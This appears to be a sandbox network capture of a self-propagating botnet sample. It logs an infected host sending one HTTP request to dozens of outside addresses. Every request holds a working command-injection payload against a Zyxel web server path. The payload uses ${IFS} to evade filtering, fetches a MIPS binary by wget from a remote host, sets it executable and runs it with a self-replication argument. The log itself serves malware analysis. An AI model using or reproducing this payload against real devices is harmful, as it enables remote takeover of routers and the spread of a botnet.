                                                Jan 29, 2024 07:07:39.130862951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2140192.168.2.2350672168.94.121.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130886078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2141192.168.2.236059273.93.152.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.130942106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2142192.168.2.2350184186.27.163.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131042004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2143192.168.2.2343786202.65.30.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131050110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2144192.168.2.233391698.153.59.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131144047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2145192.168.2.233537231.43.171.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131169081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2146192.168.2.2358914138.71.216.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131238937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2147192.168.2.233668844.113.239.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131278038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2148192.168.2.233416065.143.184.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131313086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2149192.168.2.2358886145.238.3.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131356955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2150192.168.2.234999652.237.130.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131387949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2151192.168.2.2345710153.219.80.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131442070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2152192.168.2.2355834179.222.121.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131458998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2153192.168.2.2334502117.212.119.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131500006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2154192.168.2.23353261.153.189.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131567955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2155192.168.2.23470824.67.92.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131608963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2156192.168.2.2350092192.247.170.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131668091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2157192.168.2.235583813.25.32.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131697893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2158192.168.2.233726019.104.83.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131747007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2159192.168.2.235131491.195.40.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131794930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2160192.168.2.2345214196.7.109.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131824970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2161192.168.2.2357416131.122.72.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131870985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2162192.168.2.2342074164.70.120.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131910086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2163192.168.2.2355544107.224.59.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131932020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2164192.168.2.2334758205.29.98.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.131992102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2165192.168.2.2358746200.100.38.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132033110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2166192.168.2.2339542218.120.206.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132055998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2167192.168.2.2343640165.136.193.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132100105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2168192.168.2.2348056217.9.247.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132137060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2169192.168.2.233854045.0.27.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132147074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2170192.168.2.234184212.109.128.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132181883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2171192.168.2.2337474147.39.243.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132211924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2172192.168.2.2358590197.214.209.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132246971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2173192.168.2.234551644.146.127.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132292986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2174192.168.2.2352118114.146.174.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132339954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2175192.168.2.233527267.17.102.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132379055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2176192.168.2.2345700155.217.170.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132431984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2177192.168.2.2357888146.150.157.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132468939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2178192.168.2.2334948148.84.66.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132491112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2179192.168.2.2347378103.215.114.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132535934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2180192.168.2.235182095.218.39.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132567883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2181192.168.2.235919652.206.88.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132635117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2182192.168.2.2345996196.238.153.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132664919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2183192.168.2.235861080.158.113.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132680893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2184192.168.2.2356124207.231.199.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132769108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2185192.168.2.235316672.54.185.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132802010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2186192.168.2.2337210188.184.189.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132842064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2187192.168.2.2360730193.213.139.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132894039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2188192.168.2.2356738151.47.99.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132935047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2189192.168.2.2341686167.191.71.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.132972002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2190192.168.2.23585961.28.178.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133012056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2191192.168.2.235044437.180.204.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133049965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192192.168.2.235245654.47.242.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133084059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2193192.168.2.233384438.13.225.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133142948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2194192.168.2.2343638129.164.108.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133178949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2195192.168.2.2336168159.134.9.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133219004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2196192.168.2.2341548133.174.114.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133240938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2197192.168.2.2339976123.201.66.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133279085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2198192.168.2.2345656135.70.27.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133321047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2199192.168.2.2348828102.62.23.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133369923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2200192.168.2.2337074176.105.126.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133389950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2201192.168.2.2356236177.53.171.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133420944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2202192.168.2.2351078145.89.190.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:39.133459091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2203192.168.2.2348422217.42.71.155443
                                                TimestampBytes transferredDirectionData
